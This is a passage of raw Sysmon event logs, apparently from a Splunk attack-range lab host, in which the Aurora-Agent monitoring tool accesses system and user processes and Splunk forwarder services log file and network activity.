Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.840{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.828{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.816{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.799{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.792{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:11.728{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:12.976{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8D56AD4588A49C07A9F0E31A3C98C5F,SHA256=9C133B173C9B9B8B5CEE0B01DCB2D5E8CF92C0188DE13B9838183FA322AEEEDF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000045166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:26:12.958{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d92b38-0x0d8cf632) 354300x800000000000000017617Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:09.967{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50145-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017616Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:12.152{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C1348C375FF7CB58E7EC5171F183634,SHA256=86BA7E0A4414B98764F7AC3AD6D33D21D9CF6E42E263832E1F35E1483134A987,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:12.237{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000017618Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:13.232{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9466D780990E8BBBA5EE71912BF82AA,SHA256=7804CA9AB52DCD700B5EDA4AAD455C5F72AB29E6283555CDA823B9621A5F1AF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017619Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:14.310{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A13D9D0C55CA660F8FEEFBA27A9BC0B8,SHA256=4CC4B11EDA1AF8C017FB4A1FACFF729AE6C8AB80EAEF4B9147EF2C43A4967F30,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.896{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.891{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.882{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.881{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.880{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.880{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.871{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.859{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.812{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.811{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.808{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.805{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.802{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:14.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program 